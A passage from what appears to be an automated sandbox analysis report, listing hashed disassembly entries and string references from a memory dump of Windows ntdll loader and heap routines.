                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3A1B239A00229EBCF24CF54C888BA9B3B1BF58314F1509EAD949A7251D730AF85CF94
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-2586055223
                                                                                                                                                                                                                                                                                  • Opcode ID: ec467111bd1676e9c09eab05cf5b74b8107f1ab62084aa436eaabbb9b710053f
                                                                                                                                                                                                                                                                                  • Instruction ID: 40bf41636d83d22a182a38982476e54b89870fc0e33b6434c686e7d74560c9de
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec467111bd1676e9c09eab05cf5b74b8107f1ab62084aa436eaabbb9b710053f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10612571204780AFE711DB64C848FA7BBE9FF80B60F140C59F9658B291CA74D984DB66
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                                                                                                                                                  • Opcode ID: 4c236b6b6bf0698b51d644c64e7973d063e717b93b75f6bb530d21c5fd99bb0f
                                                                                                                                                                                                                                                                                  • Instruction ID: 9dbd376865f3ff542784057e374bc83ac72f3dde7d2e13f3009e5f70d1f56776
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c236b6b6bf0698b51d644c64e7973d063e717b93b75f6bb530d21c5fd99bb0f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1931F436A00118EFDB11DB95CC89FAAB7B9FF44774F144CA1E805A7290D771EE80DA64
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                                                                                                                  • Opcode ID: 3631a205e2f590a11c2e1c08753086af8675f6026493f76114ca9405489fd5b8
                                                                                                                                                                                                                                                                                  • Instruction ID: edd25abeccb7583866ff414048604cb06c99c6a0a6af7f4db5b73315d48df30c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3631a205e2f590a11c2e1c08753086af8675f6026493f76114ca9405489fd5b8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF17C74A00609DFDB15CF69C498F6ABBB6FB44304F1489A9E416AB781D734EA81CF90
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                                                                                                                  • API String ID: 0-1168191160
                                                                                                                                                                                                                                                                                  • Opcode ID: 8531e2d1b17599e8d1a1bae705a2a65c99d964211c5ed08c3b690cc3bd70ac78
                                                                                                                                                                                                                                                                                  • Instruction ID: 2988c8b033399c4997533b059e08e46e7e757c14aa819a17a492bff44053d545
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8531e2d1b17599e8d1a1bae705a2a65c99d964211c5ed08c3b690cc3bd70ac78
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F170B1A042689BCBA0DB15CC94BE9B3B5BF44B04F144DDAD609A7240E7349F81CF98
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 05CD00C7
                                                                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 05CD0128
                                                                                                                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 05CD00F1
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                                                                                                                  • Opcode ID: c7a349bd73d6ff0283e2127f60dacbbb8e6005f9ae1e2d161ac3d788095ee73a
                                                                                                                                                                                                                                                                                  • Instruction ID: c106e5aa8cefe10f7d27260cb1ab80dfc78819d23b2e2cc97978ebabd4bc1230
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7a349bd73d6ff0283e2127f60dacbbb8e6005f9ae1e2d161ac3d788095ee73a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32E1D1316087419FD725DF28C888B2AB7E1FB84318F140E5DF5A69B2E1E774EA44CB52
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                                                                                                  • API String ID: 0-1145731471
                                                                                                                                                                                                                                                                                  • Opcode ID: 244ae8d6e05f24f2242c1106fe53fbb9ca2cdbee96421697ee0bec11d5fed0e9
                                                                                                                                                                                                                                                                                  • Instruction ID: 461ea48e0aa3ebee0c7ac1209d5920f74ada3f551adeea96735653233b598045
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 244ae8d6e05f24f2242c1106fe53fbb9ca2cdbee96421697ee0bec11d5fed0e9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1B19071A546459BCB28CF55D990BADBBB6BF44B08F148C6DE852DB790D730DE80CB10
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                                                                                                                  • Opcode ID: b1d99569d5eb1ddeac6e2d6f77741b958ab5922f2f69d69b9c8346fe8eab7f63
                                                                                                                                                                                                                                                                                  • Instruction ID: a0d9c6a9cd602ea713e83ccaa6a409e858e1bce03beabae5965d5a068d963d9f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1d99569d5eb1ddeac6e2d6f77741b958ab5922f2f69d69b9c8346fe8eab7f63
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FA16A36A016299BDF219B64CC88BEAB7B8EF04714F1009EAE909A7250D7749EC5CF54
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-2283098728
                                                                                                                                                                                                                                                                                  • Opcode ID: 3f4b13658e31065003481fb2e5a6f79fd26df29db048a5b2fa14a5aaed6f92ee
                                                                                                                                                                                                                                                                                  • Instruction ID: 3b8b4318c32bfffa70fdb1c6d80527d0790e9484c6e9f21abac79be5e4ac0c6a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f4b13658e31065003481fb2e5a6f79fd26df29db048a5b2fa14a5aaed6f92ee
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5104317047069BCB24FF38C889A39B7A2FB84718F040E2EE55287691DB70E944DB92
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 05CBE435
                                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 05CBE442
                                                                                                                                                                                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 05CBE455
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                                                                                                                                                  • Opcode ID: 761ecc7dad429ea9f1cd0f9faf8ff422c524b63fdae76e79a7898a27a87f20b2
                                                                                                                                                                                                                                                                                  • Instruction ID: 8d04cae6faa864fe0b846afb2e2486fb335daa6214927b656ea39ca1ae0f73df
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 761ecc7dad429ea9f1cd0f9faf8ff422c524b63fdae76e79a7898a27a87f20b2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F516A71304684AFE715CBA8C848FAABBF8FF05714F044DA5E94187692D374EA80DB50
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 05CCA39D
                                                                                                                                                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 05CCA396
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 05CCA3A7
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-1676968949
                                                                                                                                                                                                                                                                                  • Opcode ID: a5634adb226999ce79d43ac9d482a56398d30178c6066da58ed68fdd1058b10b
                                                                                                                                                                                                                                                                                  • Instruction ID: b537efc06d0a9afd7e9668f434bc6cf0d69bf29fe17f65f322ad0c2e00d68fc8
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5634adb226999ce79d43ac9d482a56398d30178c6066da58ed68fdd1058b10b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34512430B047459BDB21DB5DC958B367BE5BB01718F180EA8E9539B6D1D770EA01CB40
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 05D0D792
                                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 05D0D79F
                                                                                                                                                                                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 05D0D7B2
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                                                                                  • API String ID: 0-3815128232
                                                                                                                                                                                                                                                                                  • Opcode ID: 38a7267b952c5e6dae775621d84d71e7ec7fdb90e01813bcefb32cec4635cb24
                                                                                                                                                                                                                                                                                  • Instruction ID: caa2c9ebde78ddd4b2f8eb2060eb1c60794124df19aa96b68ddaa2cd914f8b96
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38a7267b952c5e6dae775621d84d71e7ec7fdb90e01813bcefb32cec4635cb24
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C5154382042548EE324EAADC844772B7E3EF85284F945C4FE4C78B2C4D676D843EBA0
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05CD80F3
                                                                                                                                                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 05CD80E9
                                                                                                                                                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 05CD80E2
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                                                                                                                                                  • Opcode ID: b01745154f09744d63597f6dcfd271b129ad28c177aa517b384de50fac57fce2
                                                                                                                                                                                                                                                                                  • Instruction ID: 80c5ba041874fbc6be4e05c9bce17933556f923af2b5031bbb2affed7529cab2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b01745154f09744d63597f6dcfd271b129ad28c177aa517b384de50fac57fce2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B410471614340ABCB20EF28DC4AF6BBBE8FF44620F405D2AB949D3250EB70D904DB91
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                                                                                                                                                  • Opcode ID: c8021f351e03234f640530bbb975814c5bc5a93e3294b9618481a19e7c3fa902
                                                                                                                                                                                                                                                                                  • Instruction ID: 58c80c492bc0ed5c28c265ae5a5e9ee1099eeba510d5807ee0f51def9f9ab375
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8021f351e03234f640530bbb975814c5bc5a93e3294b9618481a19e7c3fa902
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 394106342442408FEF25CE6DC484BB577E1EB01354F284CADD8868B656CAA9D6C9C765
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 05CD1954
                                                                                                                                                                                                                                                                                  • LdrpAllocateTls, xrefs: 05CD194A
                                                                                                                                                                                                                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05CD1943
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-4274184382
                                                                                                                                                                                                                                                                                  • Opcode ID: a27c077f88f6a67709ae5a7216fb5f2f7225a55650e92cb582e54a8601d863e8
                                                                                                                                                                                                                                                                                  • Instruction ID: d6ee59f424ad9a502a67d31da5676a06297e325dd284c02d4fbdce75eeedd850
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a27c077f88f6a67709ae5a7216fb5f2f7225a55650e92cb582e54a8601d863e8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15418D75A00206AFDB15DFA9DC86BADFBF1FF48700F184929E402A7350DB35A900DB90
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 05CD185B
                                                                                                                                                                                                                                                                                  • LdrpInitializeTls, xrefs: 05CD1851
                                                                                                                                                                                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 05CD184A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-931879808
                                                                                                                                                                                                                                                                                  • Opcode ID: e783ed43b5bdc15cb314bdfab1104f7663b31d195b3b79f034916794afa8c60c
                                                                                                                                                                                                                                                                                  • Instruction ID: eb9996af74b1ab43ecdc229d79d0ab7fefab734446ccc085b47f5abe13d82d46
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e783ed43b5bdc15cb314bdfab1104f7663b31d195b3b79f034916794afa8c60c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D31D771B10306ABDF15DA59DC8BF7AB779BB40754F0A086AF506A7280DB70BE40D790
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • @, xrefs: 05CA11C5
                                                                                                                                                                                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 05CA119B
                                                                                                                                                                                                                                                                                  • BuildLabEx, xrefs: 05CA122F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                                  • API String ID: 0-3051831665
                                                                                                                                                                                                                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                                                                  • Instruction ID: 7c379a35171d86556de0f51bb56b6308f58ee9be31ad840319331c2bd18e7a5b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE319077A0021ABBDB11DB94CC48EEEBF79EB84614F044925E515A7260E734DE05DBA0
Strings
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID:
• String ID: @$@
• API String ID: 0-149943524
Strings
• \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 05D3B5C4
• RedirectedKey, xrefs: 05D3B60E
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID:
• String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
• API String ID: 0-1388552009
Strings
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID:
• String ID: $$$
• API String ID: 0-233714265
Strings
• kLsE, xrefs: 05C605FE
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 05C60586
Memory Dump Source
